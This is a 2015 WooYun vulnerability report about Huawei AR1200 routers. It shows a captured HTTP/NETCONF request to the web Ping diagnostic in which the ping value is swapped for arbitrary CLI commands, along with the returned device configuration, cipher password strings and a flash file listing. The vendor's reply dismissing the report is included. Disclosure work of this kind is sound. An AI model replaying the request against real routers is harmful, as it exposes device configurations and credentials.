当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0117671

漏洞标题:华为AR1200系列路由器后台代码任意执行

相关厂商:华为技术有限公司

漏洞作者: 1c3z

提交时间:2015-06-02 11:15

修复时间:2015-06-06 08:14

公开时间:2015-06-06 08:14

漏洞类型:命令执行

危害等级:中

自评Rank:8

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-06-02: 细节已通知厂商并且等待厂商处理中
2015-06-06: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

学校来了一批路由器,不会配,然后测试测试了下

详细说明:

有这么个功能
系统管理 > 诊断 > Ping

选区_045.png


抓包

POST http://192.168.1.119/view/main/config.cgi HTTP/1.1
Host: 192.168.1.119
Connection: keep-alive
Content-Length: 372
Origin: http://192.168.1.119
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Ubuntu Chromium/41.0.2272.76 Chrome/41.0.2272.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept: */*
Referer: http://192.168.1.119/view/main/default.html?Version=1.2
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
SessionID=M1iBvH1s0kak71m1qqL4YFpG7iW5dxin&MessageID=280&<rpc message-id="280" xmlns="urn:ietf:params:xml:ns:netconf:base:1.0">
<edit-config operation="merge">
<target>
<running/>
</target>
<error-option>stop-on-error</error-option>
<config>
<featurename istop="true" type="cli">
<quit></quit>
<ping>192.168.1.1</ping>
</featurename>
</config>
</edit-config>
</rpc>]]>]]>


把<ping>192.168.1.1</ping>
改为<display>current-configuration</display>
返回内容

HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:29:11 GMT
Content-Type: text/xml
Content-Length: 1402
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
  <ok/>
</rpc-reply>
[V200R005C10SPC500]
#
 drop illegal-mac alarm
#
 wlan ac-global carrier id other ac id 0
#
pki realm default
 enrollment self-signed
#
aaa 
 authentication-scheme default 
 authorization-scheme default 
 accounting-scheme default 
 domain default  
 domain default_admin  
 local-user admin password irreversible-cipher %@%@o~ho0DSI#)c&'+VR0uq2.fN8Hp:0#&|@-6h~GlN!:z~CfN;.%@%@
 local-user admin privilege level 3
 local-user admin service-type telnet web http
#
firewall zone Local
 priority 16
#
interface Ethernet0/0/0
#
interface Ethernet0/0/1
#
interface Ethernet0/0/2
#
interface Ethernet0/0/3
#
interface Ethernet0/0/4
#
interface Ethernet0/0/5
#
interface Ethernet0/0/6
#
interface Ethernet0/0/7
#
interface GigabitEthernet0/0/0
#
interface GigabitEthernet0/0/1
 ip address 192.168.1.119 255.255.255.0
#
interface Cellular0/0/0
#
interface Cellular0/0/1
#
interface NULL0
#
 snmp-agent local-engineid 800007DB0330D17EED3C03
#
 http server enable
 http secure-server enable
#
user-interface con 0
 authentication-mode password
 set authentication password cipher %@%@C;@(!jYWE$qrE5"Q`q>7,7x)$I7.F$3jZ'IHQjB"E^|O7x,,%@%@
user-interface vty 0 4
 authentication-mode aaa
#
wlan ac
#
voice 
 #
 diagnose
#
return

漏洞证明:

<dir></dir>
HTTP/1.1 200 OK
Server: AR
Date: tue, 02 jun 2015 10:30:29 GMT
Content-Type: text/xml
Content-Length: 917
Set-Cookie: HttpWarnFlg=no; AR=AR; ARlanguage=property-zh_CN.js; userName=admin; ResetFlag=0; HttpWarnFlg=no
Connection: Close
<?xml version="1.0"?>
<rpc-reply xmlns="urn:ietf:params:xml:ns:netconf:base:1.0" message-id="280">
  <ok/>
</rpc-reply>
Directory of flash:/
  Idx  Attr     Size(Byte)  Date        Time(LMT)  FileName 
    0  -rw-        304,700  Mar 27 2015 15:22:32   sacrule.dat
    1  -rw-          3,850  Jun 02 2015 07:30:07   mon_file.txt
    2  -rw-    111,630,208  Jun 11 2014 03:05:56   AR1220F-V200R005C10SPC500.cc
    3  -rw-              0  Mar 27 2015 15:21:58   brdxpon_snmp_cfg.efs
    4  -rw-            694  Mar 30 2015 15:25:26   vrpcfg.zip
    5  -rw-            396  Mar 30 2015 15:25:26   private-data.txt
    6  drw-              -  Jun 11 2014 12:28:36   dhcp
    7  drw-              -  Jun 11 2014 12:28:38   security
    8  -rw-          1,260  Jun 11 2014 12:29:28   rsa_host_key.efs
    9  -rw-            540  Jun 11 2014 12:29:32   rsa_server_key.efs
510,484 KB total (401,132 KB free)

修复方案:

你们更专业。。

版权声明:转载请注明来源 1c3z@乌云

漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-06-06 08:14

厂商回复:

感谢白帽子对华为公司安全的关注。经确认,该权限为登录用户默认权限。并非漏洞。

最新状态:

暂无

漏洞评价:

评论